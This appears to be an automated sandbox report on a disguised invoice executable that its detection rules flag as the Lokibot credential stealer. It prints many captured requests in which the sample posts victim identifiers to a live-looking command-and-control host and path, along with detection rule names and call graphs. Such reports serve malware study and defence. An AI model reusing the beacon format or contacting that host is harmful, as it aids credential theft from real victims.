                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                55192.168.2.34975495.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:53.496269941 CET200OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:53.554918051 CET200OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:55.161061049 CET201INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:57 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                56192.168.2.34975595.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:55.653974056 CET201OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:55.717783928 CET202OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:57.270721912 CET202INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:59 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                57192.168.2.34975695.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:57.533679962 CET203OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:57.599260092 CET203OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:58.723098993 CET203INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:56:01 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                58192.168.2.34975795.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:58.948900938 CET204OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:59.005871058 CET205OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:59.773200035 CET205INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:56:03 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                59192.168.2.34975895.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:56:00.034214020 CET206OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:56:00.097791910 CET206OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:56:00.797030926 CET206INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:56:04 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                6192.168.2.34970595.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:20.168790102 CET130OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:20.232693911 CET130OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:21.783216000 CET130INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:24 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                60192.168.2.34975995.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:56:01.042443991 CET207OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:56:01.099145889 CET207OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:56:01.793951035 CET208INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:56:05 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                7192.168.2.34970695.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:22.484255075 CET131OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:22.548185110 CET131OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:24.053488970 CET132INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:26 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                8192.168.2.34970795.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:24.716723919 CET132OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:24.781121969 CET133OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:26.372322083 CET133INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:28 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                9192.168.2.34970895.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:26.803652048 CET134OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:26.868957043 CET134OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:28.382638931 CET134INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:31 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:00:53:56
                                Start date:30/11/2022
                                Path:C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                Imagebase:0x3d0000
                                File size:865280 bytes
                                MD5 hash:BAED30AEA51E6000571219633AA745B0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.259503560.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Target ID:1
                                Start time:00:54:03
                                Start date:30/11/2022
                                Path:C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                Imagebase:0x1d0000
                                File size:865280 bytes
                                MD5 hash:BAED30AEA51E6000571219633AA745B0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Target ID:2
                                Start time:00:54:03
                                Start date:30/11/2022
                                Path:C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                Imagebase:0x360000
                                File size:865280 bytes
                                MD5 hash:BAED30AEA51E6000571219633AA745B0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Target ID:3
                                Start time:00:54:03
                                Start date:30/11/2022
                                Path:C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                Imagebase:0xc70000
                                File size:865280 bytes
                                MD5 hash:BAED30AEA51E6000571219633AA745B0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.255109806.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.255109806.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.255109806.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.255109806.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.506514782.0000000001238000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.255040267.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                Reputation:low

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:11.4%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:105
                                  Total number of Limit Nodes:9
                                  execution_graph 14233 fab8f8 DuplicateHandle 14234 fab98e 14233->14234 14235 fafd38 14236 fafda0 CreateWindowExW 14235->14236 14238 fafe5c 14236->14238 14239 fa40d0 14240 fa40e2 14239->14240 14241 fa40ee 14240->14241 14245 fa41e1 14240->14245 14250 fa3c64 14241->14250 14243 fa410d 14246 fa4205 14245->14246 14254 fa42e0 14246->14254 14258 fa42d0 14246->14258 14251 fa3c6f 14250->14251 14266 fa51a4 14251->14266 14253 fa6a50 14253->14243 14255 fa4307 14254->14255 14257 fa43e4 14255->14257 14262 fa3de4 14255->14262 14260 fa4307 14258->14260 14259 fa43e4 14260->14259 14261 fa3de4 CreateActCtxA 14260->14261 14261->14259 14263 fa5370 CreateActCtxA 14262->14263 14265 fa5433 14263->14265 14267 fa51af 14266->14267 14270 fa57f8 14267->14270 14269 fa6af5 14269->14253 14271 fa5803 14270->14271 14274 fa5828 14271->14274 14273 fa6bda 14273->14269 14275 fa5833 14274->14275 14278 fa5858 14275->14278 14277 fa6cca 14277->14273 14280 fa5863 14278->14280 14279 fa741c 14279->14277 14280->14279 14282 fab2f0 14280->14282 14283 fab321 14282->14283 14284 fab345 14283->14284 14287 fab5b8 14283->14287 14291 fab5a9 14283->14291 14284->14279 14288 fab5c5 14287->14288 14290 fab5ff 14288->14290 14296 fa97b8 14288->14296 14290->14284 14292 fab525 14291->14292 14293 fab5b2 14291->14293 14294 fab5ff 14293->14294 14295 fa97b8 LoadLibraryExW 14293->14295 14294->14284 14295->14294 14297 fa97c3 14296->14297 14299 fac2f8 14297->14299 14300 fa9880 14297->14300 14299->14299 14301 fa988b 14300->14301 14302 fac367 14301->14302 14303 fa5858 LoadLibraryExW 14301->14303 14304 fac375 14302->14304 14309 fac3d1 14302->14309 14303->14302 14315 fae0e8 14304->14315 14321 fae0bf 14304->14321 14305 fac3a0 14305->14299 14310 fac383 14309->14310 14312 fac3d6 14309->14312 14313 fae0e8 LoadLibraryExW 14310->14313 14314 fae0bf LoadLibraryExW 14310->14314 14311 fac3a0 14311->14304 14313->14311 14314->14311 14317 fae119 14315->14317 14318 fae165 14315->14318 14316 fae125 14316->14305 14317->14316 14319 fae568 LoadLibraryExW 14317->14319 14320 fae558 LoadLibraryExW 14317->14320 14318->14305 14319->14318 14320->14318 14323 fae0e8 14321->14323 14322 fae125 14322->14305 14323->14322 14324 fae568 LoadLibraryExW 14323->14324 14325 fae558 LoadLibraryExW 14323->14325 14324->14322 14325->14322 14326 fab6d0 GetCurrentProcess 14327 fab74a GetCurrentThread 14326->14327 14328 fab743 14326->14328 14329 fab780 14327->14329 14330 fab787 GetCurrentProcess 14327->14330 14328->14327 14329->14330 14331 fab7bd 14330->14331 14332 fab7e5 GetCurrentThreadId 14331->14332 14333 fab816 14332->14333 14334 fa91d0 14337 fa92c8 14334->14337 14335 fa91df 14338 fa92db 14337->14338 14339 fa92eb 14338->14339 14343 fa9958 14338->14343 14347 fa99ad 14338->14347 14352 fa9948 14338->14352 14339->14335 14344 fa996c 14343->14344 14346 fa9991 14344->14346 14356 fa94b8 14344->14356 14346->14339 14348 fa9950 14347->14348 14351 fa99b7 14347->14351 14349 fa9991 14348->14349 14350 fa94b8 LoadLibraryExW 14348->14350 14349->14339 14350->14349 14353 fa996c 14352->14353 14354 fa94b8 LoadLibraryExW 14353->14354 14355 fa9991 14353->14355 14354->14355 14355->14339 14357 fa9b38 LoadLibraryExW 14356->14357 14359 fa9bb1 14357->14359 14359->14346 14360 fa98b0 14361 fa98f8 GetModuleHandleW 14360->14361 14362 fa98f2 14360->14362 14363 fa9925 14361->14363 14362->14361

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00FAB730
                                  • GetCurrentThread.KERNEL32 ref: 00FAB76D
                                  • GetCurrentProcess.KERNEL32 ref: 00FAB7AA
                                  • GetCurrentThreadId.KERNEL32 ref: 00FAB803
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: fdb782c2c4cbac0534c110713060b4932359ef3c81556aef0350817cae619407
                                  • Instruction ID: 27f04253d96942acb6a0eb2c32a7faa7fdc568ea2d45da0e7b9113b40d460b74
                                  • Opcode Fuzzy Hash: fdb782c2c4cbac0534c110713060b4932359ef3c81556aef0350817cae619407
                                  • Instruction Fuzzy Hash: F35156B0D042498FDB10CFA9D588BEEBBF1BF89314F248499E409A7351D7755844CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00FAB730
                                  • GetCurrentThread.KERNEL32 ref: 00FAB76D
                                  • GetCurrentProcess.KERNEL32 ref: 00FAB7AA
                                  • GetCurrentThreadId.KERNEL32 ref: 00FAB803
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 1f12287fd27bc94099d1278634147af994800ff06b05349ccec763fd05c54855
                                  • Instruction ID: 5a7a8d05416c9585a955b588c596705f74a8ae04b10f53d0e844c0956f599228
                                  • Opcode Fuzzy Hash: 1f12287fd27bc94099d1278634147af994800ff06b05349ccec763fd05c54855
                                  • Instruction Fuzzy Hash: F65155B4D042498FDB10CFAAD548BDEBBF1BF89314F248899E409A7351D7746884CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 38 fafd2e-fafd9e 39 fafda9-fafdb0 38->39 40 fafda0-fafda6 38->40 41 fafdbb-fafdf3 39->41 42 fafdb2-fafdb8 39->42 40->39 43 fafdfb-fafe5a CreateWindowExW 41->43 42->41 44 fafe5c-fafe62 43->44 45 fafe63-fafe9b 43->45 44->45 49 fafea8 45->49 50 fafe9d-fafea0 45->50 51 fafea9 49->51 50->49 51->51
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FAFE4A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: cdfdffa9fb83e6bccf981a0e87ec67f2891d3f515ca96a2c19866b45f1327cc0
                                  • Instruction ID: 6a2233e5a386c4616b500def295cb5bf89edd024e1ff664fab3f0f2a611a8f94
                                  • Opcode Fuzzy Hash: cdfdffa9fb83e6bccf981a0e87ec67f2891d3f515ca96a2c19866b45f1327cc0
                                  • Instruction Fuzzy Hash: E651C0B1D10349AFDB14CFAAC884ADEBFB1FF49314F24822AE419AB250D7749945CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 52 fafd38-fafd9e 53 fafda9-fafdb0 52->53 54 fafda0-fafda6 52->54 55 fafdbb-fafe5a CreateWindowExW 53->55 56 fafdb2-fafdb8 53->56 54->53 58 fafe5c-fafe62 55->58 59 fafe63-fafe9b 55->59 56->55 58->59 63 fafea8 59->63 64 fafe9d-fafea0 59->64 65 fafea9 63->65 64->63 65->65
                                  APIs
